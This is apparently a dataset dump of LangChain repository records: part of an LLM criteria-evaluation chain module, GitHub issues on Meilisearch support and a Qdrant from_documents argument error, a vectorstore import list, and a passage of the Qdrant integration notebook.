return "criteria_result"
def parse(self, text: str) -> Any:
"""Parse the output text.
Args:
text (str): The output text to parse.
Returns:
Any: The parsed output.
"""
reasoning, verdict = text.strip().rsplit("\n", maxsplit=1)
score = 1 if verdict.upper() == "Y" else (0 if verdict.upper() == "N" else None)
return {
"reasoning": reasoning.strip(),
"value": verdict,
"score": score,
}
CRITERIA_TYPE = Union[
Mapping[str, str],
Criteria,
ConstitutionalPrinciple,
]
class CriteriaEvalChain(StringEvaluator, LLMEvalChain, LLMChain):
"""LLM Chain for evaluating runs against criteria.
Parameters
----------
llm : BaseLanguageModel
The language model to use for evaluation.
criteria : Union[Mapping[str, str]]
The criteriaor rubric to evaluate the runs against. It can be a mapping of
criterion name to its sdescription, or a single criterion name.
prompt : Optional[BasePromptTemplate], default=None
The prompt template to use for generating prompts. If not provided, a
default prompt template will be used based on the value of
`requires_reference`.
requires_reference : bool, default=False
Whether the evaluation requires a reference text. If `True`, the
`PROMPT_WITH_REFERENCES` template will be used, which includes the
reference labels in the prompt. Otherwise, the `PROMPT` template will be
used, which is a reference-free prompt.
**kwargs : Any
Additional keyword arguments to pass to the `LLMChain` constructor.
Returns
-------
CriteriaEvalChain
An instance of the `CriteriaEvalChain` class.
Examples
--------
>>> from langchain.chat_models import ChatAnthropic
>>> from langchain.evaluation.criteria import CriteriaEvalChain
>>> llm = ChatAnthropic(temperature=0)
>>> criteria = {"my-custom-criterion": "Is the submission the most amazing ever?"}
>>> evaluator = CriteriaEvalChain.from_llm(llm=llm, criteria=criteria)
>>> evaluator.evaluate_strings(prediction="Imagine an ice cream flavor for the color aquamarine", input="Tell me an idea")
{
'reasoning': 'Here is my step-by-step reasoning for the given criteria:\\n\\nThe criterion is: "Is the submission the most amazing ever?" This is a subjective criterion and open to interpretation. The submission suggests an aquamarine-colored ice cream flavor which is creative but may or may not be considered the most amazing idea ever conceived. There are many possible amazing ideas and this one ice cream flavor suggestion may or may not rise to that level for every person. \\n\\nN',
'value': 'N',
'score': 0,
}
>>> from langchain.chat_models import ChatOpenAI
>>> from langchain.evaluation.criteria import LabeledCriteriaEvalChain
>>> llm = ChatOpenAI(model="gpt-4", temperature=0)
>>> criteria = "correctness"
>>> evaluator = LabeledCriteriaEvalChain.from_llm(
... llm=llm,
... criteria=criteria,
... )
>>> evaluator.evaluate_strings(
... prediction="The answer is 4",
... input="How many apples are there?",
... reference="There are 3 apples",
... )
{
'score': 0,
'reasoning': 'The criterion for this task is the correctness of the submission. The submission states that there are 4 apples, but the reference indicates that there are actually 3 apples. Therefore, the submission is not correct, accurate, or factual according to the given criterion.\\n\\nN',
'value': 'N',
}
""" # noqa: E501
output_parser: BaseOutputParser = Field(default_factory=CriteriaResultOutputParser)
"""The parser to use to map the output to a structured result."""
criterion_name: str
"""The name of the criterion being evaluated."""
output_key: str = "results" #: :meta private:
class Config:
"""Configuration for the QAEvalChain."""
extra = Extra.ignore
@property
def requires_reference(self) -> bool:
"""Whether the evaluation requires a reference text."""
return False
@property
def requires_input(self) -> bool:
return True
@property
def evaluation_name(self) -> str:
"""Get the name of the evaluation.
Returns
-------
str
The name of the evaluation.
"""
return self.criterion_name
@property
def _skip_reference_warning(self) -> str:
"""Warning to show when reference is ignored."""
return (
f"Ignoring reference in {self.__class__.__name__}, as it is not expected."
"\nTo use references, use the labeled_criteria instead."
)
@classmethod
def resolve_criteria(
cls,
criteria: Optional[Union[CRITERIA_TYPE, str]],
) -> Dict[str, str]:
"""Resolve the criteria to evaluate.
Parameters
----------
criteria : CRITERIA_TYPE
The criteria to evaluate the runs against. It can be:
- a mapping of a criterion name to its description
- a single criterion name present in one of the default criteria
- a single `ConstitutionalPrinciple` instance
Returns
-------
Dict[str, str]
A dictionary mapping criterion names to descriptions.
Examples
--------
>>> criterion = "relevance"
>>> CriteriaEvalChain.resolve_criteria(criteria)
{'relevance': 'Is the submission referring to a real quote from the text?'}
""" # noqa: E501
if criteria is None:
return {
"helpfulness": _SUPPORTED_CRITERIA[Criteria.HELPFULNESS],
}
if isinstance(criteria, Criteria):
criteria_ = {criteria.value: _SUPPORTED_CRITERIA[criteria]}
elif isinstance(criteria, str):
criteria_ = {criteria: _SUPPORTED_CRITERIA[Criteria(criteria)]}
elif isinstance(criteria, ConstitutionalPrinciple):
criteria_ = {criteria.name: criteria.critique_request}
else:
if not criteria:
raise ValueError(
"Criteria cannot be empty. "
"Please provide a criterion name or a mapping of the criterion name"
" to its description."
)
criteria_ = dict(criteria)
return criteria_
@classmethod
def _resolve_prompt(
cls, prompt: Optional[BasePromptTemplate] = None
) -> BasePromptTemplate:
expected_input_vars = {"input", "output", "criteria"}
prompt_ = prompt or PROMPT
if expected_input_vars != set(prompt_.input_variables):
raise ValueError(
f"Input variables should be {expected_input_vars}, "
f"but got {prompt_.input_variables}"
)
return prompt_
@classmethod
def from_llm(
cls,
llm: BaseLanguageModel,
criteria: Optional[CRITERIA_TYPE] = None,
*,
prompt: Optional[BasePromptTemplate] = None,
**kwargs: Any,
) -> CriteriaEvalChain:
"""Create a `CriteriaEvalChain` instance from an llm and criteria.
Parameters
----------
llm : BaseLanguageModel
The language model to use for evaluation.
criteria : CRITERIA_TYPE - default=None for "helpfulness"
The criteria to evaluate the runs against. It can be:
- a mapping of a criterion name to its description
- a single criterion name present in one of the default criteria
- a single `ConstitutionalPrinciple` instance
prompt : Optional[BasePromptTemplate], default=None
The prompt template to use for generating prompts. If not provided,
a default prompt template will be used.
**kwargs : Any
Additional keyword arguments to pass to the `LLMChain`
constructor.
Returns
-------
CriteriaEvalChain
An instance of the `CriteriaEvalChain` class.
Examples
--------
>>> from langchain.llms import OpenAI
>>> from langchain.evaluation.criteria import LabeledCriteriaEvalChain
>>> llm = OpenAI()
>>> criteria = {
"hallucination": (
"Does this submission contain information"
" not present in the input or reference?"
),
}
>>> chain = LabeledCriteriaEvalChain.from_llm(
llm=llm,
criteria=criteria,
)
"""
prompt_ = cls._resolve_prompt(prompt)
if criteria == Criteria.CORRECTNESS:
raise ValueError(
"Correctness should not be used in the reference-free"
" 'criteria' evaluator (CriteriaEvalChain)."
" Please use the 'labeled_criteria' evaluator"
" (LabeledCriteriaEvalChain) instead."
)
criteria_ = cls.resolve_criteria(criteria)
criteria_str = " ".join(f"{k}: {v}" for k, v in criteria_.items())
prompt_ = prompt_.partial(criteria=criteria_str)
return cls(
llm=llm,
prompt=prompt_,
criterion_name="-".join(criteria_),
**kwargs,
)
def _get_eval_input(
self,
prediction: str,
reference: Optional[str],
input: Optional[str],
) -> dict:
"""Get the evaluation input."""
input_ = {
"input": input,
"output": prediction,
}
if self.requires_reference:
input_["reference"] = reference
return input_
def _prepare_output(self, result: dict) -> dict:
"""Prepare the output."""
parsed = result[self.output_key]
if RUN_KEY in result:
parsed[RUN_KEY] = result[RUN_KEY]
return parsed
def _evaluate_strings(
self,
*,
prediction: str,
reference: Optional[str] = None,
input: Optional[str] = None,
callbacks: Callbacks = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
include_run_info: bool = False,
**kwargs: Any,
) -> dict:
"""Evaluate a prediction against the criteria.
Parameters
----------
prediction : str
The predicted text to evaluate.
reference : Optional[str], default=None
The reference text to compare against. This is required if
`requires_reference` is `True`.
input : Optional[str], default=None
The input text used to generate the prediction.
**kwargs : Any
Additional keyword arguments to pass to the `LLMChain` `__call__`
method.
Returns
-------
dict
The evaluation results.
Examples
--------
>>> from langchain.llms import OpenAI
>>> from langchain.evaluation.criteria import CriteriaEvalChain
>>> llm = OpenAI()
>>> criteria = "conciseness"
>>> chain = CriteriaEvalChain.from_llm(llm=llm, criteria=criteria)
>>> chain.evaluate_strings(
prediction="The answer is 42.",
reference="42",
input="What is the answer to life, the universe, and everything?",
)
"""
input_ = self._get_eval_input(prediction, reference, input)
result = self(
input_,
callbacks=callbacks,
tags=tags,
metadata=metadata,
include_run_info=include_run_info,
)
return self._prepare_output(result)
async def _aevaluate_strings(
self,
*,
prediction: str,
reference: Optional[str] = None,
input: Optional[str] = None,
callbacks: Callbacks = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
include_run_info: bool = False,
**kwargs: Any,
) -> dict:
"""Asynchronously evaluate a prediction against the criteria.
Parameters
----------
prediction : str
The predicted text to evaluate.
reference : Optional[str], default=None
The reference text to compare against. This is required if
`requires_reference` is `True`.
input : Optional[str], default=None
The input text used to generate the prediction.
**kwargs : Any
Additional keyword arguments to pass to the `LLMChain` `acall`
method.
Returns
-------
dict
The evaluation results.
Examples
--------
>>> from langchain.llms import OpenAI
>>> from langchain.evaluation.criteria import CriteriaEvalChain
>>> llm = OpenAI()
>>> criteria = "conciseness"
>>> chain = CriteriaEvalChain.from_llm(llm=llm, criteria=criteria)
>>> await chain.aevaluate_strings(
prediction="The answer is 42.",
reference="42",
input="What is the answer to life, the universe, and everything?",
)
"""
input_ = self._get_eval_input(prediction, reference, input)
result = await self.acall(
input_,
callbacks=callbacks,
tags=tags,
metadata=metadata,
include_run_info=include_run_info,
)
return self._prepare_output(result)
class LabeledCriteriaEvalChain(CriteriaEvalChain):
"""Criteria evaluation chain that requires references."""
@property
def requires_reference(self) -> bool:
"""Whether the evaluation requires a reference text."""
return True
@classmethod
def _resolve_prompt(
cls, prompt: Optional[BasePromptTemplate] = None
) -> BasePromptTemplate:
expected_input_vars = {"input", "output", "criteria", "reference"}
prompt_ = prompt or PROMPT_WITH_REFERENCES
if expected_input_vars != set(prompt_.input_variables):
raise ValueError(
f"Input variables should be {expected_input_vars}, "
f"but got {prompt_.input_variables}"
)
return prompt_
@classmethod
def from_llm(
cls,
llm: BaseLanguageModel,
criteria: Optional[CRITERIA_TYPE] = None,
*,
prompt: Optional[BasePromptTemplate] = None,
**kwargs: Any,
) -> CriteriaEvalChain:
"""Create a `LabeledCriteriaEvalChain` instance from an llm and criteria.
Parameters
----------
llm : BaseLanguageModel
The language model to use for evaluation.
criteria : CRITERIA_TYPE - default=None for "helpfulness"
The criteria to evaluate the runs against. It can be:
- a mapping of a criterion name to its description
- a single criterion name present in one of the default criteria
- a single `ConstitutionalPrinciple` instance
prompt : Optional[BasePromptTemplate], default=None
The prompt template to use for generating prompts. If not provided,
a default prompt will be used.
**kwargs : Any
Additional keyword arguments to pass to the `LLMChain`
constructor.
Returns
-------
LabeledCriteriaEvalChain
An instance of the `LabeledCriteriaEvalChain` class.
Examples
--------
>>> from langchain.llms import OpenAI
>>> from langchain.evaluation.criteria import LabeledCriteriaEvalChain
>>> llm = OpenAI()
>>> criteria = {
"hallucination": (
"Does this submission contain information"
" not present in the input or reference?"
),
}
>>> chain = LabeledCriteriaEvalChain.from_llm(
llm=llm,
criteria=criteria,
)
"""
prompt = cls._resolve_prompt(prompt)
criteria_ = cls.resolve_criteria(criteria)
criteria_str = " ".join(f"{k}: {v}" for k, v in criteria_.items())
prompt_ = prompt.partial(criteria=criteria_str)
return cls(
llm=llm,
prompt=prompt_,
criterion_name="-".join(criteria_),
**kwargs,
)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,603 | Add support for Meilisearch vector databases | ### Feature request
Add support for Meilisearch vector search.
[Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs)
### Motivation
Meilisearch is releasing the vector search/store feature, which should be available from July 31st.
### Your contribution
I'm working on it and will submit a PR for this issue soon. | https://github.com/langchain-ai/langchain/issues/7603 | https://github.com/langchain-ai/langchain/pull/7649 | b7d6e1909cf5346a4384280fba3d732597778bae | 8ee56b9a5b3751db122bd896daeb1e0b7766def3 | "2023-07-12T15:32:23Z" | python | "2023-07-29T00:06:54Z" | docs/extras/integrations/vectorstores/meilisearch.ipynb | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,603 | Add support for Meilisearch vector databases | ### Feature request
Add support for Meilisearch vector search.
[Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs)
### Motivation
Meilisearch is releasing the vector search/store feature, which should be available from July 31st.
### Your contribution
I'm working on it and will submit a PR for this issue soon. | https://github.com/langchain-ai/langchain/issues/7603 | https://github.com/langchain-ai/langchain/pull/7649 | b7d6e1909cf5346a4384280fba3d732597778bae | 8ee56b9a5b3751db122bd896daeb1e0b7766def3 | "2023-07-12T15:32:23Z" | python | "2023-07-29T00:06:54Z" | libs/langchain/langchain/vectorstores/__init__.py | """Wrappers on top of vector stores."""
from langchain.vectorstores.alibabacloud_opensearch import (
AlibabaCloudOpenSearch,
AlibabaCloudOpenSearchSettings,
)
from langchain.vectorstores.analyticdb import AnalyticDB
from langchain.vectorstores.annoy import Annoy
from langchain.vectorstores.atlas import AtlasDB
from langchain.vectorstores.awadb import AwaDB
from langchain.vectorstores.azuresearch import AzureSearch
from langchain.vectorstores.base import VectorStore
from langchain.vectorstores.cassandra import Cassandra
from langchain.vectorstores.chroma import Chroma
from langchain.vectorstores.clarifai import Clarifai
from langchain.vectorstores.clickhouse import Clickhouse, ClickhouseSettings
from langchain.vectorstores.deeplake import DeepLake
from langchain.vectorstores.docarray import DocArrayHnswSearch, DocArrayInMemorySearch
from langchain.vectorstores.elastic_vector_search import (
ElasticKnnSearch,
ElasticVectorSearch,
)
from langchain.vectorstores.faiss import FAISS
from langchain.vectorstores.hologres import Hologres
from langchain.vectorstores.lancedb import LanceDB
from langchain.vectorstores.marqo import Marqo
from langchain.vectorstores.matching_engine import MatchingEngine
from langchain.vectorstores.milvus import Milvus
from langchain.vectorstores.mongodb_atlas import MongoDBAtlasVectorSearch
from langchain.vectorstores.myscale import MyScale, MyScaleSettings
from langchain.vectorstores.opensearch_vector_search import OpenSearchVectorSearch
from langchain.vectorstores.pgembedding import PGEmbedding
from langchain.vectorstores.pgvector import PGVector
from langchain.vectorstores.pinecone import Pinecone
from langchain.vectorstores.qdrant import Qdrant
from langchain.vectorstores.redis import Redis
from langchain.vectorstores.rocksetdb import Rockset
from langchain.vectorstores.singlestoredb import SingleStoreDB
from langchain.vectorstores.sklearn import SKLearnVectorStore
from langchain.vectorstores.starrocks import StarRocks
from langchain.vectorstores.supabase import SupabaseVectorStore
from langchain.vectorstores.tair import Tair
from langchain.vectorstores.tigris import Tigris
from langchain.vectorstores.typesense import Typesense
from langchain.vectorstores.vectara import Vectara
from langchain.vectorstores.weaviate import Weaviate
from langchain.vectorstores.zilliz import Zilliz
__all__ = [
"AlibabaCloudOpenSearch",
"AlibabaCloudOpenSearchSettings",
"AnalyticDB",
"Annoy",
"AtlasDB",
"AwaDB",
"AzureSearch",
"Cassandra",
"Chroma",
"Clickhouse",
"ClickhouseSettings",
"DeepLake",
"DocArrayHnswSearch",
"DocArrayInMemorySearch",
"ElasticVectorSearch",
"ElasticKnnSearch",
"FAISS",
"PGEmbedding",
"Hologres",
"LanceDB",
"MatchingEngine",
"Marqo",
"Milvus",
"Zilliz",
"SingleStoreDB",
"Chroma",
"Clarifai",
"OpenSearchVectorSearch",
"AtlasDB",
"DeepLake",
"Annoy",
"MongoDBAtlasVectorSearch",
"MyScale",
"MyScaleSettings",
"OpenSearchVectorSearch",
"Pinecone",
"Qdrant",
"Redis",
"Rockset",
"SKLearnVectorStore",
"SingleStoreDB",
"StarRocks",
"SupabaseVectorStore",
"Tair",
"Tigris",
"Typesense",
"Vectara",
"VectorStore",
"Weaviate",
"Zilliz",
"PGVector",
]
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,603 | Add support for Meilisearch vector databases | ### Feature request
Add support for Meilisearch vector search.
[Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs)
### Motivation
Meilisearch is releasing the vector search/store feature, which should be available from July 31st.
### Your contribution
I'm working on it and will submit a PR for this issue soon. | https://github.com/langchain-ai/langchain/issues/7603 | https://github.com/langchain-ai/langchain/pull/7649 | b7d6e1909cf5346a4384280fba3d732597778bae | 8ee56b9a5b3751db122bd896daeb1e0b7766def3 | "2023-07-12T15:32:23Z" | python | "2023-07-29T00:06:54Z" | libs/langchain/langchain/vectorstores/meilisearch.py | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,603 | Add support for Meilisearch vector databases | ### Feature request
Add support for Meilisearch vector search.
[Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs)
### Motivation
Meilisearch is releasing the vector search/store feature, which should be available from July 31st.
### Your contribution
I'm working on it and will submit a PR for this issue soon. | https://github.com/langchain-ai/langchain/issues/7603 | https://github.com/langchain-ai/langchain/pull/7649 | b7d6e1909cf5346a4384280fba3d732597778bae | 8ee56b9a5b3751db122bd896daeb1e0b7766def3 | "2023-07-12T15:32:23Z" | python | "2023-07-29T00:06:54Z" | libs/langchain/tests/integration_tests/vectorstores/docker-compose/meilisearch.yaml | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 7,603 | Add support for Meilisearch vector databases | ### Feature request
Add support for Meilisearch vector search.
[Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs)
### Motivation
Meilisearch is releasing the vector search/store feature, which should be available from July 31st.
### Your contribution
I'm working on it and will submit a PR for this issue soon. | https://github.com/langchain-ai/langchain/issues/7603 | https://github.com/langchain-ai/langchain/pull/7649 | b7d6e1909cf5346a4384280fba3d732597778bae | 8ee56b9a5b3751db122bd896daeb1e0b7766def3 | "2023-07-12T15:32:23Z" | python | "2023-07-29T00:06:54Z" | libs/langchain/tests/integration_tests/vectorstores/test_meilisearch.py | |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,457 | VectorStore.from_documents() takes 3 positional arguments but 4 were given | ### System Info
... % python --version
Python 3.11.4
... % pip show langchain | grep Version
Version: 0.0.247
### Who can help?
@eyurtsev
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
When following the langchain docs [here](https://python.langchain.com/docs/integrations/vectorstores/qdrant#qdrant-cloud), there will be an error thrown:
```py
qdrant = Qdrant.from_documents(
docs,
embeddings,
url,
prefer_grpc=True,
api_key=api_key,
collection_name="test",
)
```
error:
```
Traceback (most recent call last):
File "...myscript.py", line 29, in <module>
qdrant = Qdrant.from_documents(
^^^^^^^^^^^^^^^^^^^^^^
TypeError: VectorStore.from_documents() takes 3 positional arguments but 4 were given
```
Is it related to https://github.com/langchain-ai/langchain/pull/7910 ?
### Expected behavior
QDrant being initialized properly. | https://github.com/langchain-ai/langchain/issues/8457 | https://github.com/langchain-ai/langchain/pull/8482 | 4923cf029a36504a00368abe6b9c8b77e46aa740 | 08f5e6b8012f5eda2609103f33676199a3781a15 | "2023-07-29T10:53:33Z" | python | "2023-07-30T20:24:44Z" | docs/extras/integrations/vectorstores/qdrant.ipynb | {
"cells": [
{
"attachments": {},
"cell_type": "markdown",
"id": "683953b3",
"metadata": {},
"source": [
"# Qdrant\n",
"\n",
">[Qdrant](https://qdrant.tech/documentation/) (read: quadrant ) is a vector similarity search engine. It provides a production-ready service with a convenient API to store, search, and manage points - vectors with an additional payload. `Qdrant` is tailored to extended filtering support. It makes it useful for all sorts of neural network or semantic-based matching, faceted search, and other applications.\n",
"\n",
"\n",
"This notebook shows how to use functionality related to the `Qdrant` vector database. \n",
"\n",
"There are various modes of how to run `Qdrant`, and depending on the chosen one, there will be some subtle differences. The options include:\n",
"- Local mode, no server required\n",
"- On-premise server deployment\n",
"- Qdrant Cloud\n",
"\n",
"See the [installation instructions](https://qdrant.tech/documentation/install/)."
]
},
{
"cell_type": "code",
"execution_count": null,
"id": "e03e8460-8f32-4d1f-bb93-4f7636a476fa",
"metadata": {
"tags": []
},
"outputs": [],
"source": [
"!pip install qdrant-client"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "7b2f111b-357a-4f42-9730-ef0603bdc1b5",
"metadata": {},
"source": [
"We want to use `OpenAIEmbeddings` so we have to get the OpenAI API Key."
]
},
{
"cell_type": "code",
"execution_count": 2,
"id": "082e7e8b-ac52-430c-98d6-8f0924457642",
"metadata": {
"tags": []
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"OpenAI API Key: \u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\n"
]
}
],
"source": [
"import os\n",
"import getpass\n",
"\n",
"os.environ[\"OPENAI_API_KEY\"] = getpass.getpass(\"OpenAI API Key:\")"
]
},
{
"cell_type": "code",
"execution_count": 3,
"id": "aac9563e",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:22.282884Z",
"start_time": "2023-04-04T10:51:21.408077Z"
},
"tags": []
},
"outputs": [],
"source": [
"from langchain.embeddings.openai import OpenAIEmbeddings\n",
"from langchain.text_splitter import CharacterTextSplitter\n",
"from langchain.vectorstores import Qdrant\n",
"from langchain.document_loaders import TextLoader"
]
},
{
"cell_type": "code",
"execution_count": 4,
"id": "a3c3999a",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:22.520144Z",
"start_time": "2023-04-04T10:51:22.285826Z"
},
"tags": []
},
"outputs": [],
"source": [
"loader = TextLoader(\"../../../state_of_the_union.txt\")\n",
"documents = loader.load()\n",
"text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n",
"docs = text_splitter.split_documents(documents)\n",
"\n",
"embeddings = OpenAIEmbeddings()"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "eeead681",
"metadata": {},
"source": [
"## Connecting to Qdrant from LangChain\n",
"\n",
"### Local mode\n",
"\n",
"Python client allows you to run the same code in local mode without running the Qdrant server. That's great for testing things out and debugging or if you plan to store just a small amount of vectors. The embeddings might be fully kepy in memory or persisted on disk.\n",
"\n",
"#### In-memory\n",
"\n",
"For some testing scenarios and quick experiments, you may prefer to keep all the data in memory only, so it gets lost when the client is destroyed - usually at the end of your script/notebook."
]
},
{
"cell_type": "code",
"execution_count": 5,
"id": "8429667e",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:22.525091Z",
"start_time": "2023-04-04T10:51:22.522015Z"
},
"tags": []
},
"outputs": [],
"source": [
"qdrant = Qdrant.from_documents(\n",
" docs,\n",
" embeddings,\n",
" location=\":memory:\", # Local mode with in-memory storage only\n",
" collection_name=\"my_documents\",\n",
")"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "59f0b954",
"metadata": {},
"source": [
"#### On-disk storage\n",
"\n",
"Local mode, without using the Qdrant server, may also store your vectors on disk so they're persisted between runs."
]
},
{
"cell_type": "code",
"execution_count": 6,
"id": "24b370e2",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:24.827567Z",
"start_time": "2023-04-04T10:51:22.529080Z"
},
"tags": []
},
"outputs": [],
"source": [
"qdrant = Qdrant.from_documents(\n",
" docs,\n",
" embeddings,\n",
" path=\"/tmp/local_qdrant\",\n",
" collection_name=\"my_documents\",\n",
")"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "749658ce",
"metadata": {},
"source": [
"### On-premise server deployment\n",
"\n",
"No matter if you choose to launch Qdrant locally with [a Docker container](https://qdrant.tech/documentation/install/), or select a Kubernetes deployment with [the official Helm chart](https://github.com/qdrant/qdrant-helm), the way you're going to connect to such an instance will be identical. You'll need to provide a URL pointing to the service."
]
},
{
"cell_type": "code",
"execution_count": 5,
"id": "91e7f5ce",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:24.832708Z",
"start_time": "2023-04-04T10:51:24.829905Z"
}
},
"outputs": [],
"source": [
"url = \"<---qdrant url here --->\"\n",
"qdrant = Qdrant.from_documents(\n",
" docs,\n",
" embeddings,\n",
" url,\n",
" prefer_grpc=True,\n",
" collection_name=\"my_documents\",\n",
")"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "c9e21ce9",
"metadata": {},
"source": [
"### Qdrant Cloud\n",
"\n",
"If you prefer not to keep yourself busy with managing the infrastructure, you can choose to set up a fully-managed Qdrant cluster on [Qdrant Cloud](https://cloud.qdrant.io/). There is a free forever 1GB cluster included for trying out. The main difference with using a managed version of Qdrant is that you'll need to provide an API key to secure your deployment from being accessed publicly."
]
},
{
"cell_type": "code",
"execution_count": 6,
"id": "dcf88bdf",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:24.837599Z",
"start_time": "2023-04-04T10:51:24.834690Z"
}
},
"outputs": [],
"source": [
"url = \"<---qdrant cloud cluster url here --->\"\n",
"api_key = \"<---api key here--->\"\n",
"qdrant = Qdrant.from_documents(\n",
" docs,\n",
" embeddings,\n",
" url,\n",
" prefer_grpc=True,\n",
" api_key=api_key,\n",
" collection_name=\"my_documents\",\n",
")"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "93540013",
"metadata": {},
"source": [
"## Recreating the collection\n",
"\n",
"Both `Qdrant.from_texts` and `Qdrant.from_documents` methods are great to start using Qdrant with Langchain. In the previous versions the collection was recreated every time you called any of them. That behaviour has changed. Currently, the collection is going to be reused if it already exists. Setting `force_recreate` to `True` allows to remove the old collection and start from scratch."
]
},
{
"cell_type": "code",
"execution_count": 8,
"id": "30a87570",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:24.854117Z",
"start_time": "2023-04-04T10:51:24.845385Z"
}
},
"outputs": [],
"source": [
"url = \"<---qdrant url here --->\"\n",
"qdrant = Qdrant.from_documents(\n",
" docs,\n",
" embeddings,\n",
" url,\n",
" prefer_grpc=True,\n",
" collection_name=\"my_documents\",\n",
" force_recreate=True,\n",
")"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "1f9215c8",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T09:27:29.920258Z",
"start_time": "2023-04-04T09:27:29.913714Z"
}
},
"source": [
"## Similarity search\n",
"\n",
"The simplest scenario for using Qdrant vector store is to perform a similarity search. Under the hood, our query will be encoded with the `embedding_function` and used to find similar documents in Qdrant collection."
]
},
{
"cell_type": "code",
"execution_count": 7,
"id": "a8c513ab",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:25.204469Z",
"start_time": "2023-04-04T10:51:24.855618Z"
},
"tags": []
},
"outputs": [],
"source": [
"query = \"What did the president say about Ketanji Brown Jackson\"\n",
"found_docs = qdrant.similarity_search(query)"
]
},
{
"cell_type": "code",
"execution_count": 8,
"id": "fc516993",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:25.220984Z",
"start_time": "2023-04-04T10:51:25.213943Z"
},
"tags": []
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you\u2019re at it, pass the Disclose Act so Americans can know who is funding our elections. \n",
"\n",
"Tonight, I\u2019d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer\u2014an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n",
"\n",
"One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n",
"\n",
"And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation\u2019s top legal minds, who will continue Justice Breyer\u2019s legacy of excellence.\n"
]
}
],
"source": [
"print(found_docs[0].page_content)"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "1bda9bf5",
"metadata": {},
"source": [
"## Similarity search with score\n",
"\n",
"Sometimes we might want to perform the search, but also obtain a relevancy score to know how good is a particular result. \n",
"The returned distance score is cosine distance. Therefore, a lower score is better."
]
},
{
"cell_type": "code",
"execution_count": 11,
"id": "8804a21d",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:25.631585Z",
"start_time": "2023-04-04T10:51:25.227384Z"
}
},
"outputs": [],
"source": [
"query = \"What did the president say about Ketanji Brown Jackson\"\n",
"found_docs = qdrant.similarity_search_with_score(query)"
]
},
{
"cell_type": "code",
"execution_count": 12,
"id": "756a6887",
"metadata": {
"ExecuteTime": {
"end_time": "2023-04-04T10:51:25.642282Z",
"start_time": "2023-04-04T10:51:25.635947Z"
}
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you\u2019re at it, pass the Disclose Act so Americans can know who is funding our elections. \n",
"\n",
"Tonight, I\u2019d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer\u2014an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n",
"\n",
"One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n",
"\n",
"And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation\u2019s top legal minds, who will continue Justice Breyer\u2019s legacy of excellence.\n",
"\n",
"Score: 0.8153784913324512\n"
]
}
],
"source": [
"document, score = found_docs[0]\n",
"print(document.page_content)\n",
"print(f\"\\nScore: {score}\")"
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "525e3582",
"metadata": {},
"source": [
"### Metadata filtering\n",
"\n",
"Qdrant has an [extensive filtering system](https://qdrant.tech/documentation/concepts/filtering/) with rich type support. It is also possible to use the filters in Langchain, by passing an additional param to both the `similarity_search_with_score` and `similarity_search` methods."
]
},
{
"attachments": {},
"cell_type": "markdown",
"id": "1c2c58dc",
"metadata": {},
"source": [
